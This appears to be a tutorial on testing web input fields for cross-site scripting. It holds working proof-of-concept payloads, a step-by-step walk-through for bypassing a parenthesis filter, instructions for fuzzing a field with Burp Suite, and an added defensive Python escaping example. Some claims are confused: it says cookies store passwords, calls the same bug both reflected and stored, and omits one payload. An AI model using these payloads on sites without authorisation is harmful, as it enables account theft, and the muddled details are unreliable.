XSS (cross-site scripting) is one of the most common vulnerabilities in websites that rely on JavaScript today. The injected input originates on the client side and travels to the server. The attacker, who is also a user of a certain web page, carries out the cross-site scripting technique, and approaches websites in a random manner.
There is no selected target from the attacker's point of view. An XSS injection is mainly about placing unwanted JavaScript with which the attacker can run a malicious script in other users' browsers. These malicious scripts are called payloads.
Requirements for XSS injection:
1. An input field such as a submission form, contact form or a login field.
2. Common XSS payloads containing an XMLHttpRequest, plain JavaScript or HTML code.
3. A browser with no XSS filters. Firefox is the better choice; Chrome is not recommended because it ships with some default XSS filters, which are themselves not fully secure.
Guidance for the injection procedure:
Do end users face any problem from reflected XSS?
Obviously, the answer is yes. If the payload executes perfectly with no interruption, it is easy to run those payloads in the users' browsers, and so their cookies, such as user names and passwords, can be captured. It is not the users' responsibility to stay away from XSS attacks; the problem actually lies on the web page and browser side.
What if the random payload is not executed successfully?
In most cases these random payloads only give a chance of reflected XSS. But you can adjust your script in order to turn it into a successful injection.
This scenario involves analysing the HTML response. First, inject the payload into the field and wait for the response; if the XSS is not triggered, move on to examining the HTML response for the payload you inserted. For example, in this case I am entering a normal payload:
"><img src=x onerror=prompt(document.domain)>
And the HTML response was:
<input type="text" id="*" name="*" value=""><img img" class="form-control" rel="gp" data-size="20" data-character-set="a-z,A-Z,0-9">
From this we can understand that some specific characters, such as < and ", are not filtered properly and are reflected in the response. So, to take advantage of this,
XSS can also be done by adding some HTML attributes. So if I execute this payload,
The HTML response was:
<input type="text" id="*" name="*" value="" OnMouseOver=prompt(" class="form-control" rel="gp" data-size="20" data-character-set="a-z,A-Z,0-9">
In this response the brackets () are being filtered. So after removing the brackets from the payload, the response will be:
<input type="text" id="*" name="*" value="" OnMouseOver=prompt`1`" class="form-control" rel="gp" data-size="20" data-character-set="a-z,A-Z,0-9">
And after adding a double quote after the equals sign, the response will be:
<input type="text" id="ipn_secret_keygen" name="ipn_secret_keygen" value=""OnMouseOver="alert`1`" class="form-control" rel="gp" data-size="20" data-character-set="a-z,A-Z,0-9">
Looks good. And now when I click on the web page, a pop-up finally appears as a result of stored XSS.
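As an added example (not part of the original post, and not the target site's code), here is a Python model of why the filter in the responses above fails: a blocklist that strips only parentheses still lets the input close the value attribute, whereas context-aware attribute escaping keeps every payload shape shown on this page inert. The field name, the template and the parenthesis-only filter are assumptions; the sample inputs are constructed from the responses above.

```python
import html
from html.parser import HTMLParser

# Constructed inputs that mirror the payload shapes in the walk-through above.
SAMPLE_INPUTS = [
    '"><img src=x onerror=prompt(document.domain)>',
    '" OnMouseOver=prompt`1`',
    '"OnMouseOver="alert`1`"',
    "plain text",
]
# Simplified form of the response shown on the page (hypothetical field name).
TEMPLATE = '<input type="text" id="f" name="f" value="{}" class="form-control">'

def blocklist_filter(value: str) -> str:
    """Assumed model of the page's filter: parentheses are stripped, while
    quotes and angle brackets are reflected unchanged."""
    return value.replace("(", "").replace(")", "")

def render_blocklist(value: str) -> str:
    return TEMPLATE.format(blocklist_filter(value))

def render_escaped(value: str) -> str:
    # Context-aware output encoding for a double-quoted attribute: & < > " '
    # become entities, so the input can never close the attribute or the tag.
    return TEMPLATE.format(html.escape(value, quote=True))

class _Audit(HTMLParser):
    """Reads the markup the way a browser would and records what it sees."""
    def __init__(self):
        super().__init__()
        self.tags, self.handlers, self.value = [], [], None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        for name, val in attrs:
            if name.startswith("on"):
                self.handlers.append(name)  # an event handler reached the parser
            if tag == "input" and name == "value":
                self.value = val  # the text the browser takes as the field value

def audit(markup: str) -> dict:
    """Safe means: exactly the one input tag, no event handlers, value intact."""
    p = _Audit()
    p.feed(markup)
    p.close()
    return {"tags": p.tags, "handlers": p.handlers, "value": p.value,
            "safe": p.tags == ["input"] and not p.handlers}
```

Run `audit(render_blocklist(s))` and `audit(render_escaped(s))` over `SAMPLE_INPUTS`: the blocklist output grows an img tag or an onmouseover handler, while the escaped output always parses back to a single input whose value is the original text.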
Payload and response credits : Medium
This is an alternative to checking for XSS with your payloads one by one: you can check for XSS with a larger number of payloads at the same time. Start Burp Suite and capture the request of the web page, then locate the input field. Add the field to the interceptor, select your payload list and load it, and then forward the request. The tool will carry out the injection and show the responses in the attack interface. Find the payload with the greater response length, inject it into the web page and analyse the result.